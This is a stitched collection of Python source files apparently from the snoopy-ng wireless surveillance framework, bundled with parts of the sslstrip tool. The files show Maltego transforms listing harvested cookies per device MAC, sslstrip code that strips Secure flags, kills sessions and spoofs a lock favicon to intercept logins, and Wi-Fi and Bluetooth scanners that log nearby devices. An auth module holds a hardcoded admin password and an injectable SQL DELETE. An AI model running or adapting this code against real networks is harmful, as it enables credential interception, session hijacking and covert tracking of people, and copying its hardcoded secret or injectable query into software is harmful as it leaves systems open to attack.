    #filters.extend((cookies.c.client_mac==mac, cookies.c.baseDomain==domain)) #Bug: baseDomain being returned as full URL.
    filters.extend((cookies.c.client_mac==mac, cookies.c.host==domain))
    s = select([cookies.c.name, cookies.c.value], and_(*filters))
    logging.debug(s) 
    #s = select([ssids.c.ssid]).where(ssids.c.mac==mac).distinct()
    r = db.execute(s)
    results = r.fetchall()
    logging.debug(results)
    #results = [t[0] for t in results]
    TRX = MaltegoTransform()

    illegal_xml_re = re.compile(u'[\x00-\x08\x0b-\x1f\x7f-\x84\x86-\x9f\ud800-\udfff\ufdd0-\ufddf\ufffe-\uffff]')


    for cookie in results:
        logging.debug(cookie)
        name, value = cookie
        NewEnt=TRX.addEntity("snoopy.Cookie", name)
        NewEnt.addAdditionalFields("value","Value", "strict",value)
        NewEnt.addAdditionalFields("fqdn","Domain", "strict",domain)
        NewEnt.addAdditionalFields("mac","Client Mac", "strict",mac)

    TRX.returnOutput()

main()
#me = MaltegoTransform()
#me.addEntity("maltego.Phrase","hello bob")
#me.returnOutput()                



# Copyright (c) 2004-2011 Moxie Marlinspike
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#

import logging
import string

class CookieCleaner:
    '''This class cleans cookies we haven't seen before.  The basic idea is to
    kill sessions, which isn't entirely straight-forward.  Since we want this to
    be generalized, there's no way for us to know exactly what cookie we're trying
    to kill, which also means we don't know what domain or path it has been set for.

    The rule with cookies is that specific overrides general.  So cookies that are
    set for mail.foo.com override cookies with the same name that are set for .foo.com,
    just as cookies that are set for foo.com/mail override cookies with the same name
    that are set for foo.com/

    The best we can do is guess, so we just try to cover our bases by expiring cookies
    in a few different ways.  The most obvious thing to do is look for individual cookies
    and nail the ones we haven't seen coming from the server, but the problem is that cookies are often
    set by Javascript instead of a Set-Cookie header, and if we block those the site
    will think cookies are disabled in the browser.  So we do the expirations and whitlisting
    based on client,server tuples.  The first time a client hits a server, we kill whatever
    cookies we see then.  After that, we just let them through.  Not perfect, but pretty effective.

    '''

    _instance = None

    def getInstance():
        if CookieCleaner._instance == None:
            CookieCleaner._instance = CookieCleaner()

        return CookieCleaner._instance

    getInstance = staticmethod(getInstance)

    def __init__(self):
        self.cleanedCookies = set();
        self.enabled        = False

    def setEnabled(self, enabled):
        self.enabled = enabled

    def isClean(self, method, client, host, headers):
        if method == "POST":             return True
        if not self.enabled:             return True
        if not self.hasCookies(headers): return True
        
        return (client, self.getDomainFor(host)) in self.cleanedCookies

    def getExpireHeaders(self, method, client, host, headers, path):
        domain = self.getDomainFor(host)
        self.cleanedCookies.add((client, domain))

        expireHeaders = []

        for cookie in headers['cookie'].split(";"):
            cookie                 = cookie.split("=")[0].strip()            
            expireHeadersForCookie = self.getExpireCookieStringFor(cookie, host, domain, path)            
            expireHeaders.extend(expireHeadersForCookie)
        
        return expireHeaders

    def hasCookies(self, headers):
        return 'cookie' in headers        

    def getDomainFor(self, host):
        hostParts = host.split(".")
        return "." + hostParts[-2] + "." + hostParts[-1]

    def getExpireCookieStringFor(self, cookie, host, domain, path):
        pathList      = path.split("/")
        expireStrings = list()
        
        expireStrings.append(cookie + "=" + "EXPIRED;Path=/;Domain=" + domain + 
                             ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n")

        expireStrings.append(cookie + "=" + "EXPIRED;Path=/;Domain=" + host + 
                             ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n")

        if len(pathList) > 2:
            expireStrings.append(cookie + "=" + "EXPIRED;Path=/" + pathList[1] + ";Domain=" +
                                 domain + ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n")

            expireStrings.append(cookie + "=" + "EXPIRED;Path=/" + pathList[1] + ";Domain=" +
                                 host + ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n")
        
        return expireStrings

    



#!/usr/bin/env python
# -*- coding: utf-8 -*-
from subprocess import Popen, call, PIPE
import os
#from sys import stdout, stdin # Flushing
import re
import logging

#logging.basicConfig(level=logging.DEBUG,
#                    format='%(asctime)s %(levelname)s %(filename)s: %(message)s',
#                    datefmt='%Y-%m-%d %H:%M:%S')

DN = open(os.devnull, 'w')

def enable_monitor_mode(iface=''):
    #First, disable all existing monitor interfaces
    disable_monitor_mode()
    #If not specified, take the last wireless interface.		
    if not iface:
        proc  = Popen(['airmon-ng'], stdout=PIPE, stderr=DN)
        for line in proc.communicate()[0].split('\n'):
            if 'phy' in line and not line.startswith("mon"):
                    iface=re.split(r"\s",line)[0]
    if iface:
        logging.debug("Enabling monitor mode on '%s'"%iface)
        call(['airmon-ng', 'check', 'kill'], stdout=DN, stderr=DN)
        call(['airmon-ng', 'start', iface], stdout=DN, stderr=DN)
        monif = get_monitor_iface()
        if monif:
            logging.debug("Enabled monitor mode '%s'"%monif[0])
            return monif[0]
    else:
        logging.debug("No wireless interface supporting monitor mode found")
        return None

def disable_monitor_mode(iface=''):
    #Disable all monitor interfaces
    if not iface:
        for device in get_monitor_iface():
            disable_monitor_mode(device)
            #call(['airmon-ng', 'stop', device], stdout=DN, stderr=DN)
    else:
        logging.debug("Disabling monitor mode on '%s'"%iface) 
        call(['airmon-ng', 'stop', iface], stdout=DN, stderr=DN)

def get_monitor_iface():
    proc  = Popen(['iwconfig'], stdout=PIPE, stderr=DN)
    iface = ''
    monitors = []
    for line in proc.communicate()[0].split('\n'):
        if len(line) == 0: continue
        if ord(line[0]) != 32: # Doesn't start with space
            iface = line[:line.find(' ')] # is the interface
            if line.find('Mode:Monitor') != -1:
                monitors.append(iface)
    return monitors



#!/usr/bin/env python
# -*- coding: utf-8 -*-

import logging
import sqlalchemy as sa
from threading import Thread
import time
import os
from collections import deque
import requests
import json
from includes.jsonify import json_list_to_objs
import base64
from includes.fonts import *

#logging.basicConfig(level=logging.DEBUG)

class Snoop(Thread):
    def __init__(self, **kwargs):
        Thread.__init__(self)
        self.server = kwargs.get('server_url')
        self.sync_freq = int(kwargs.get('sync_freq', 60))
        self.drone = kwargs.get('drone')
        self.key = kwargs.get('key')
        self.RUN = True
        self.data_store = deque()
        self.last_sync = 0

        self.verb = kwargs.get('verbose', 0)
        self.fname = os.path.splitext(os.path.basename(__file__))[0]

        if not self.server:
            logging.error("Please specify a remote server.")
            exit(-1)

        if not self.drone or not self.key:
            logging.error("Please supply drone (--drone) and key (--key) in order to fetch data from the remote server.")
            exit(-1)
   
    def run(self):
        logging.info("Local Sync plugin will pull remote database replica every %d seconds" % self.sync_freq)
        while self.RUN:
            time.sleep(5)

    def is_ready(self):
        """Indicates the module is ready, and loading of next module may commence."""
        return True

    def stop(self):
        """Perform operations required to stop module and return"""
        self.RUN = False

    @staticmethod
    def get_parameter_list():
        """List of paramters that can be passed to the module, for user help output."""
        info = {"info" : "Pull database from remote server and sync it into the local one. Make sure to specify valid --drone and --key options for the remote server.",
                "parameter_list" : [
                                    ("server_url=<url>","URL of server to pull data from. Server plugin should be running on that machine. (e.g. 'http://1.1.1.1:9001/'"),
                                    ("sync_freq=<secs>", "Frequency to pull a full replica of remote database in seconds")
                                    ]
                }
        return info

    def get_data(self):
        base64string = base64.encodestring('%s:%s' % (self.drone, self.key)).replace('\n', '')
        headers = {'content-type': 'application/json',
                   'Z-Auth': self.key, 'Z-Drone': self.drone, 'Authorization':'Basic %s' % base64string}
        rtnData = []
        now = int(os.times()[4])
        if abs(now - self.last_sync) > self.sync_freq:
            try:
                r = requests.get(self.server+"pull/", headers=headers)
            except Exception,e:
                logging.error("Error fetching remote data. Exception was '%s'" % e)
            else:
                if r.status_code == 200:
                    data = json_list_to_objs(r.text)
                    data_len = 0
                    for row in data:
                        rtnData.append( (row['table'], row['data']) )
                        data_len += len(row['data'])
                    if self.verb > 0:
                        logging.info("Plugin %s%s%s pulled %s%d%s records from remote server." % (GR,self.fname,G,GR,data_len,G))
                else:
                    logging.error("Error fetching remote data. Response code was %d"%r.status_code)
            self.last_sync = now    #Success or not, we'll wait another n seconds
        time.sleep(0.5)
        return rtnData

    @staticmethod
    def get_tables():
        """Return the table definitions for this module."""
        return []

if __name__ == "__main__":
    Snoop().start()



# Copyright (c) 2004-2009 Moxie Marlinspike
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#

import logging, re, string

from ServerConnection import ServerConnection

class SSLServerConnection(ServerConnection):

    ''' 
    For SSL connections to a server, we need to do some additional stripping.  First we need
    to make note of any relative links, as the server will be expecting those to be requested
    via SSL as well.  We also want to slip our favicon in here and kill the secure bit on cookies.
    '''

    cookieExpression   = re.compile(r"([ \w\d:#@%/;$()~_?\+-=\\\.&]+); ?Secure", re.IGNORECASE)
    cssExpression      = re.compile(r"url\(([\w\d:#@%/;$~_?\+-=\\\.&]+)\)", re.IGNORECASE)
    iconExpression     = re.compile(r"<link rel=\"shortcut icon\" .*href=\"([\w\d:#@%/;$()~_?\+-=\\\.&]+)\".*>", re.IGNORECASE)
    linkExpression     = re.compile(r"<((a)|(link)|(img)|(script)|(frame)) .*((href)|(src))=\"([\w\d:#@%/;$()~_?\+-=\\\.&]+)\".*>", re.IGNORECASE)
    headExpression     = re.compile(r"<head>", re.IGNORECASE)

    def __init__(self, command, uri, postData, headers, client):
	self.client = client
        ServerConnection.__init__(self, command, uri, postData, headers, client)

    def getLogLevel(self):
        return logging.INFO

    def getPostPrefix(self):
        return "SECURE POST"

    def handleHeader(self, key, value):
        if (key.lower() == 'set-cookie'):
            value = SSLServerConnection.cookieExpression.sub("\g<1>", value)

        ServerConnection.handleHeader(self, key, value)

    def stripFileFromPath(self, path):
        (strippedPath, lastSlash, file) = path.rpartition('/')
        return strippedPath

    def buildAbsoluteLink(self, link):
        absoluteLink = ""
        
        if ((not link.startswith('http')) and (not link.startswith('/'))):                
            absoluteLink = "http://"+self.headers['host']+self.stripFileFromPath(self.uri)+'/'+link

            logging.debug("Client:%s Found path-relative link in secure transmission: " + link % (self.client.getClientIP()))
            logging.debug("Client:%s New Absolute path-relative link: " + absoluteLink % (self.clien.getClientIP()))                
        elif not link.startswith('http'):
            absoluteLink = "http://"+self.headers['host']+link

            logging.debug("Client:%s Found relative link in secure transmission: " + link % (self.client.getClientIP()))
            logging.debug("Client:%s New Absolute link: " + absoluteLink % (self.client.getClientIP()))                            

        if not absoluteLink == "":                
            absoluteLink = absoluteLink.replace('&amp;', '&')
            self.urlMonitor.addSecureLink(self.client.getClientIP(), absoluteLink);        

    def replaceCssLinks(self, data):
        iterator = re.finditer(SSLServerConnection.cssExpression, data)

        for match in iterator:
            self.buildAbsoluteLink(match.group(1))

        return data

    def replaceFavicon(self, data):
        match = re.search(SSLServerConnection.iconExpression, data)

        if (match != None):
            data = re.sub(SSLServerConnection.iconExpression,
                          "<link rel=\"SHORTCUT ICON\" href=\"/favicon-x-favicon-x.ico\">", data)
        else:
            data = re.sub(SSLServerConnection.headExpression,
                          "<head><link rel=\"SHORTCUT ICON\" href=\"/favicon-x-favicon-x.ico\">", data)
            
        return data
        
    def replaceSecureLinks(self, data):
        data = ServerConnection.replaceSecureLinks(self, data)
        data = self.replaceCssLinks(data)

        if (self.urlMonitor.isFaviconSpoofing()):
            data = self.replaceFavicon(data)

        iterator = re.finditer(SSLServerConnection.linkExpression, data)

        for match in iterator:
            self.buildAbsoluteLink(match.group(10))

        return data



#!/usr/bin/python
# -*- coding: utf-8 -*-
# glenn@sensepost.com_
# snoopy_ng // 2013
# By using this code you agree to abide by the supplied LICENSE.txt

import sys
import os
from MaltegoTransform import *
import logging
from datetime import datetime
from sqlalchemy import create_engine, MetaData, select, and_
from transformCommon import *
from base64 import b64decode
from xml.sax.saxutils import escape
import re
from wigle_api import Wigle

logging.basicConfig(level=logging.DEBUG,filename='/tmp/maltego_logs.txt',format='%(asctime)s %(levelname)s: %(message)s',datefmt='%Y-%m-%d %H:%M:%S')
illegal_xml_re = re.compile(u'[\x00-\x08\x0b-\x1f\x7f-\x84\x86-\x9f\ud800-\udfff\ufdd0-\ufddf\ufffe-\uffff]')

def main():
#    print "Content-type: xml\n\n";
#    MaltegoXML_in = sys.stdin.read()
#    logging.debug(MaltegoXML_in)
#    if MaltegoXML_in <> '':
#     m = MaltegoMsg(MaltegoXML_in)

    TRX = MaltegoTransform()
    TRX.parseArguments(sys.argv)
    lat = float(TRX.getVar("latitude"))
    lng = float(TRX.getVar("longitude"))
    address = TRX.getVar("longaddress")

    logging.debug(lat)
    logging.debug(address)

    try:
        f = open("wigle_creds.txt", "r")
        user, passw, email,proxy = f.readline().strip().split(":")
    except Exception, e:
        print "ERROR: Unable to read Wigle user & pass, email (and optional proxy) from wigle_creds.txt"
        print e
        exit(-1)
    wig=Wigle(user, passw, email, proxy)
    if not wig.login():
        print "ERROR: Unable to login to Wigle with creds from wigle_creds.txt. Please check them."
        exit(-1)
    ssids = wig.fetchNearbySSIDs(lat=lat,lng=lng,address=address)
    if 'error' in ssids:
        print "ERROR: Unable to query Wigle. Perhaps your IP/user is shunned. Error was '%s'" % ssids
        exit(-1)

    for s,coords in ssids.iteritems():
        ssid=escape(s)
        ssid = illegal_xml_re.sub('', ssid)
        lat,lng,dist = coords

        NewEnt=TRX.addEntity("snoopy.SSID", ssid)
        NewEnt.addAdditionalFields("ssid","ssid", "strict",ssid)
        NewEnt.addAdditionalFields("lat","latitude", "strict",str(lat))
        NewEnt.addAdditionalFields("long","longitude", "strict",str(lng))
        NewEnt.setWeight(int((1.0/dist)*500))
        NewEnt.addAdditionalFields("dist","distance", "strict",str(dist))

    TRX.returnOutput()

main()



#!/usr/bin/env python
# -*- coding: utf-8 -*-
from sqlalchemy import create_engine, MetaData, Table, Column, String,\
                   select, and_, Integer, ForeignKey, delete
from sqlalchemy.exc import *
import os
import sys
import logging
import random
import string
from sqlalchemy.ext.compiler import compiles
from sqlalchemy.sql.expression import Insert

path=os.path.dirname(os.path.realpath(__file__))

@compiles(Insert)
def replace_string(insert, compiler, **kw):
    s = compiler.visit_insert(insert, **kw)
    s = s.replace("INSERT INTO", "REPLACE INTO")
    return s

class auth:
    """Handle authentication"""
    def __init__(self,dbms="sqlite:///%s/snoopy_creds.db" % path, rawdb=None):
        if not rawdb:
            self.db = create_engine(dbms)
        else:
            self.db = rawdb
        self.metadata = MetaData(self.db)
        self.metadata.reflect()

        drone_tbl_def = Table('drones', MetaData(),
                            Column('drone', String(40), primary_key=True),
                            Column('key', String(40)))

        user_tbl_def = Table('users', MetaData(),
                            Column('user', String(40), primary_key=True),
                            #Column('drone', String(40), ForeignKey('drones.drone')))
                            Column('drone', String(40), primary_key=True, autoincrement=False))

        mt_tbl_def = Table('mtk', MetaData(),
                            Column('user', String(40), primary_key=True),
                            Column('mtkey', String(40), primary_key=True, autoincrement=False))
        
        if 'drones' not in self.metadata.tables.keys():
            self.db.create(drone_tbl_def)
        if 'users' not in self.metadata.tables.keys():
            self.db.create(user_tbl_def)
        if 'mtk' not in self.metadata.tables.keys():
            self.db.create(mt_tbl_def)

        self.metadata.reflect()
        self.drone_table = self.metadata.tables['drones']
        self.user_table = self.metadata.tables['users']
        self.mtk_table = self.metadata.tables['mtk']

    def associate_drone(self, drone, user):
        assert drone
        assert user

        #Check if a Maltego key exists
        s = select([self.mtk_table]).where(self.mtk_table.c.user == user)
        r = self.db.execute(s)
        results = r.fetchall()
        if len(results) <= 0:
            mtkey = ''.join(random.choice(string.ascii_uppercase + string.digits)
                            for x in range(15))
            self.mtk_table.insert().execute(user=user,mtkey=mtkey)

        self.user_table.insert().execute(user=user,drone=drone)

    def disassociate_drone(self, drone, user):
        assert drone
        assert user
        d = delete(self.user_table,  and_(self.user_table.c.drone == drone, self.user_table.c.user == user))
        r = self.db.execute(d)
        return r.rowcount

    def list_mtk(self,user):
        filter = []
        if user:
            filter.append(self.mtk_table.c.user == user) 
        results = list(self.mtk_table.select(and_(*filter)).execute().fetchall())
        toReturn = []
        for row in results:
            usr,mtk = row[0],row[1]
            toReturn.append({"user":usr,"mtk":mtk})
        return toReturn   
        
    def list_associations(self, user=None):
        filter = []
        if user:
            filter.append(self.user_table.c.user == user )
        results =  list(self.user_table.select(and_(*filter)).execute().fetchall())
        toReturn = []
        for row in results:
            usr,snsr = row[0], row[1]
            toReturn.append({"user":usr, "sensor":snsr }) 
        return toReturn

    def manage_drone_account(self, drone, operation):
    
        if operation == "create":
            try:
                key = ''.join(random.choice(string.ascii_uppercase + string.digits)
                              for x in range(15))
                self.drone_table.insert().execute(drone=drone, key=key)
                logging.info("Created new drone '%s'" % drone)
            except IntegrityError:
                logging.error("Drone '%s' already exists!" %drone) #REPLACE INTO will actually just replace it
            except Exception:
                logging.exception("Exception whilst attempting to add drone")
            else:
                return key
        elif operation == "delete":
            result = self.db.execute("DELETE FROM drones WHERE drone='{0}'".format(drone))
            if result.rowcount == 0:
                logging.warning("No such account. Ignoring")
            #self.drone_table.delete().execute(drone=drone)
            return True
        elif operation == "list":
            return(self.drone_table.select().execute().fetchall())
        else:
            logging.error("Bad operation '%s' passed to manage_drone_account" %
                          operation)
            return False
    
    def verify_account(self,_drone, _key):
        try:
            self.drone_table=self.metadata.tables['drones']
            s = select([self.drone_table],
                       and_(self.drone_table.c.drone==_drone, self.drone_table.c.key==_key))
            result = self.db.execute(s).fetchone()
    
            if result:
                #logging.debug("Auth granted for %s" % _drone)
                return True
            else:
                logging.debug("Access denied for %s" % _drone)
                return False
        except Exception, e:
            logging.error('Unable to query access control database. Have you run snoopy_auth to create an account?')
            return False
    
    def verify_admin(self,user, pwd):
        if user == "serval" and pwd == "tanzaniaMountainClimbing13":
            return True

if __name__ == "__main__":
    import argparse

    cwd = os.path.dirname(os.path.realpath(__file__))
    snoopy_db = "sqlite:///" + cwd[:cwd.rfind("/")] + "/snoopy.db"

    parser = argparse.ArgumentParser()
    parser.add_argument("-c","--create", help="Create a new drone account")
    parser.add_argument("-d","--delete", help="Delete an existing drone account")
    parser.add_argument("-l","--list", help="List all drones and keys", action="store_true")
    parser.add_argument("-a", "--assoc", help="Associate user to drone (supply <user>,<drone>)")
    parser.add_argument("-r", "--disassoc", help="Dis-associate user and drone (supply <user>,<drone>)")
    parser.add_argument("-u","--users", help="List user/drone associations.", nargs='?', const="*")
    parser.add_argument("-b", "--dbms", help="Specify Snoopy database in SQLAlchemy format. Default will use snoopy-ng/snoopy.db", default=snoopy_db)
    args = parser.parse_args()

    if len(sys.argv) < 2:
        print "[!] No options supplied. Try --help."
    else:

        auth_ = auth(args.dbms)
        if args.assoc:
            usr,drn = args.assoc.split(",")
            print "[+] Associating user '%s' to drone '%s'" %(usr,drn)
            auth_.associate_drone(user=usr,drone=drn)

        if args.disassoc:
            usr,drn = args.disassoc.split(",")
            print "[+] Dis-associating user '%s' and drone '%s'" % (usr,drn)
            n = auth_.disassociate_drone(user=usr,drone=drn)
            print "    %d associations removed" % n
        if args.users:
            print "[+] User/drone associations:"
            if args.users == "*":
                args.users = None
            for pair in auth_.list_associations(user=args.users):
                print "\t%s:%s" %(pair['user'],pair['sensor'])

        if args.create:
            print "[+] Creating new Snoopy server sync account"
            key = auth_.manage_drone_account(args.create, "create")
            if key:
                print "[+] Key for '%s' is '%s'" % (args.create, key)
                print "[+] Use this value in client mode to sync data to a remote server."
        elif args.delete:
            if auth_.manage_drone_account(args.delete, "delete"):
                print "[+] Deleting '%s'" % args.delete
        elif args.list:
            print "[+] Available drone accounts:"
            drones = auth_.manage_drone_account("foo", "list")
            for d in drones:
                print "\t%s:%s" % (d[0], d[1])




#!/usr/bin/env python
# -*- coding: utf-8 -*-

import time
import logging
from sqlalchemy import MetaData, Table, Column, String, Unicode, Integer, DateTime
from threading import Thread
import os
from includes.fonts import *
from includes.prox import prox
from includes.fifoDict import fifoDict
from includes.common import snoop_hash, printFreq
import datetime
logging.basicConfig(level=logging.DEBUG,
                    format='%(asctime)s %(levelname)s %(filename)s: %(message)s',
                    datefmt='%Y-%m-%d %H:%M:%S')

class Snoop(Thread):
    def __init__(self, **kwargs):
        Thread.__init__(self)
        self.RUN = True
        self.verb = kwargs.get('verbose', 0)
        self.proxWindow = kwargs.get('proxWindow', 300)
        self.fname = os.path.splitext(os.path.basename(__file__))[0]

        self.prox = prox(proxWindow=self.proxWindow, identName="mac", verb=0, callerName=self.fname)
        self.vendors = fifoDict(names=("mac", "vendor", "vendorLong"))
        self.btDetails = fifoDict(names=("mac", "name", "classType", "manufac", "lmpVer"))
        self.lastPrintUpdate = 0

    def run(self):
        from includes.bluScan import scan
        reported = False
        while self.RUN:
            logging.debug("Scanning for bluetooth devices")
            scanResults = scan()
            if scanResults:
                for result in scanResults:
                    mac = result['mac']
                    name = result['name'].decode('utf-8')
                    vendor,vendorLong = result['vendor'], result['vendorLong']
                    classType = result['classType']
                    manufac = result['manufac']
                    lmpVer = result['lmpVer']
    
                    self.prox.pulse(mac)
                    self.vendors.add((mac, vendor, vendorLong))
                    self.btDetails.add((mac,name,classType,manufac,lmpVer))

                    if self.verb > 1:
                        logging.info("Plugin %s%s%s watching device '%s%s%s' (%s%s%s) with name '%s%s%s'." % (GR,self.fname,G,GR,mac,G,GR,vendorLong,G,GR,name,G))

            tmptimer=0
            while self.RUN and tmptimer < 5:
                time.sleep(0.1)
                tmptimer += 0.1

    def stop(self):
        logging.info("Shutting down Bluetooth scanner, may take 30 seconds...")
        self.RUN = False

    def is_ready(self):
        return True

    @staticmethod
    def get_parameter_list():
        info = {"info" : "Discovers Bluetooth devices.",
                "parameter_list" : None
                }
        return info

    def get_data(self):
        """Ensure data is returned in the form of a SQL row."""
        proxSess =  self.prox.getProxs()
        btList = self.btDetails.getNew()
        vendorsList = self.vendors.getNew()

        if proxSess and self.verb > 0 and abs(os.times()[4] - self.lastPrintUpdate) > printFreq:
            logging.info("Sub-plugin %s%s%s currently observing %s%d%s client devices" % (GR,self.fname,G,GR,self.prox.getNumProxs(),G))
            self.lastPrintUpdate = os.times()[4]
            
        return [("bluetooth_obs", proxSess), ("vendors", vendorsList), ("bluetooth_details", btList)]
    

    @staticmethod
    def get_tables():

        table = Table('bluetooth_obs', MetaData(),
                      Column('mac', String(64), primary_key=True), #Len 64 for sha256
                      Column('first_obs', DateTime, primary_key=True, autoincrement=False),
                      Column('last_obs', DateTime),
                      Column('sunc', Integer, default=0),
                    )

        table2 = Table('bluetooth_details', MetaData(),
                    Column('mac', String(64), primary_key=True), #Len 64 for sha256
                    Column('name', String(64)),
                    Column('classType', String(24)),
                    Column('manufac', String(64)),
                    Column('lmpVer', String(12)))

        table3 = Table('vendors', MetaData(),
                      Column('mac', String(64), primary_key=True), #Len 64 for sha256
                      Column('vendor', String(20) ),
                      Column('vendorLong', String(50) ),
                      Column('sunc', Integer, default=0))


        return [table, table2, table3]


if __name__=="__main__":
    Snoop().start()



#!/usr/bin/env python
# -*- coding: utf-8 -*-
# glenn@sensepost.com

from collections import OrderedDict

class fifoDict:
    """OrderedDict with FIFO size constraint"""
    def __init__(self, size=1000, reducePc=0.2, names=None):
        """
            'names' paramter should be a n tuple the same same size as a tuple passed to the add method
            For example, names = ('mac', 'ssid')
        """
        self.od = OrderedDict()
        self.sz = size
        self.reducePc=0.5
        self.names = names

    def add(self, item):
        if item not in self.od:
            self.od[item] = 0

    def getNew(self):    
        newData = []
        markAsFetched = []
        for key, val in self.od.iteritems():
            if val == 0:
                newData.append( key )
        for key in newData:
            self.od[key] = 1
        #Reduce size of dict by reducePc % :
        if len(self.od) > self.sz:
            for i in range(int(self.reducePc * self.sz)):
                try:
                    self.od.popitem(last = False)
                except KeyError:
                    pass
        #If keys were supplied, combine with values and return 
        if self.names:
            toReturn = []
            for ident in newData:
                row = dict(zip(self.names,ident))
                toReturn.append(row)
            return toReturn
        else:
            return newData



#!/usr/bin/python
# -*- coding: utf-8 -*-
# glenn@sensepost.com_
# snoopy_ng // 2013
# By using this code you agree to abide by the supplied LICENSE.txt

import sys
import os
from MaltegoTransform import *
import logging
from datetime import datetime
from sqlalchemy import create_engine, MetaData, select, and_, func
from transformCommon import *
from base64 import b64decode
from xml.sax.saxutils import escape
import re
logging.basicConfig(level=logging.DEBUG,filename='/tmp/maltego_logs.txt',format='%(asctime)s %(levelname)s: %(message)s',datefmt='%Y-%m-%d %H:%M:%S')

def main():

##    filters.append(wigle.c.ssid == ssid)
##    filters.append(wigle.c.overflow == 0)
##    s = select([wigle], and_(*filters)).distinct().limit(limit)
    #s = select([ssids.c.ssid]).where(ssids.c.mac==mac).distinct()
##    r = db.execute(s)
##    results = r.fetchall()
##    logging.debug(results)
##    TRX = MaltegoTransform()
    illegal_xml_re = re.compile(u'[\x00-\x08\x0b-\x1f\x7f-\x84\x86-\x9f\ud800-\udfff\ufdd0-\ufddf\ufffe-\uffff]')


    #location = "ITWeb_2013"
    filters = []
    filters.append(sess.c.location == location)
    filters.append(sess.c.run_id == ssids.c.run_id)
    filters.append(ssids.c.ssid == wigle.c.ssid)
    sub_q = select([wigle.c.country, func.count(wigle.c.country)], and_(*filters)).group_by(wigle.c.ssid).having(func.count()==1)
    s = select([sub_q.c.country,func.count(sub_q.c.country)], and_(sub_q.c.country != "")).group_by(sub_q.c.country)

    r = db.execute(s)
    results = r.fetchall() 

    for res in results:
        country, count = res
        if count > 2:
            country = illegal_xml_re.sub('', country)
            NewEnt=TRX.addEntity("maltego.Location", country)
            NewEnt.addAdditionalFields("count", "count", "strict", str(count))
            NewEnt.setWeight(count)

    TRX.returnOutput()

main()



#!/usr/bin/env python

"""sslstrip is a MITM tool that implements Moxie Marlinspike's SSL stripping attacks."""
 
__author__ = "Moxie Marlinspike"
__email__  = "moxie@thoughtcrime.org"
__license__= """
Copyright (c) 2004-2009 Moxie Marlinspike <moxie@thoughtcrime.org>
 
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License as
published by the Free Software Foundation; either version 3 of the
License, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but
WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
USA

"""

from twisted.web import http
from twisted.internet import reactor

from sslstrip.StrippingProxy import StrippingProxy
from sslstrip.URLMonitor import URLMonitor
from sslstrip.CookieCleaner import CookieCleaner

import sys, getopt, logging, traceback, string, os

gVersion = "0.9"

def usage():
    print "\nsslstrip " + gVersion + " by Moxie Marlinspike"
    print "Usage: sslstrip <options>\n"
    print "Options:"
    print "-w <filename>, --write=<filename> Specify file to log to (optional)."
    print "-p , --post                       Log only SSL POSTs. (default)"
    print "-s , --ssl                        Log all SSL traffic to and from server."
    print "-a , --all                        Log all SSL and HTTP traffic to and from server."
    print "-l <port>, --listen=<port>        Port to listen on (default 10000)."
    print "-f , --favicon                    Substitute a lock favicon on secure requests."
    print "-k , --killsessions               Kill sessions in progress."
    print "-h                                Print this help message."
    print ""

def parseOptions(argv):
    logFile      = 'sslstrip.log'
    logLevel     = logging.WARNING
    listenPort   = 10000
    spoofFavicon = False
    killSessions = False
    
    try:                                
        opts, args = getopt.getopt(argv, "hw:l:psafk", 
                                   ["help", "write=", "post", "ssl", "all", "listen=", 
                                    "favicon", "killsessions"])

        for opt, arg in opts:
            if opt in ("-h", "--help"):
                usage()
                sys.exit()
            elif opt in ("-w", "--write"):
                logFile = arg
            elif opt in ("-p", "--post"):
                logLevel = logging.WARNING
            elif opt in ("-s", "--ssl"):
                logLevel = logging.INFO
            elif opt in ("-a", "--all"):
                logLevel = logging.DEBUG
            elif opt in ("-l", "--listen"):
                listenPort = arg
            elif opt in ("-f", "--favicon"):
                spoofFavicon = True
            elif opt in ("-k", "--killsessions"):
                killSessions = True

        return (logFile, logLevel, listenPort, spoofFavicon, killSessions)
                    
    except getopt.GetoptError:           
        usage()                          
        sys.exit(2)                         

def main(argv):
    print argv
    print type(argv)

    (logFile, logLevel, listenPort, spoofFavicon, killSessions) = parseOptions(argv)
        
    logging.basicConfig(level=logLevel, format='%(asctime)s %(message)s',
                        filename=logFile, filemode='a')

    URLMonitor.getInstance().setFaviconSpoofing(spoofFavicon)
    CookieCleaner.getInstance().setEnabled(killSessions)

    strippingFactory              = http.HTTPFactory(timeout=10)
    strippingFactory.protocol     = StrippingProxy

    reactor.listenTCP(int(listenPort), strippingFactory)
                
    print "\nsslstrip " + gVersion + " by Moxie Marlinspike running..."

    reactor.run()

if __name__ == '__main__':
    main(sys.argv[1:])
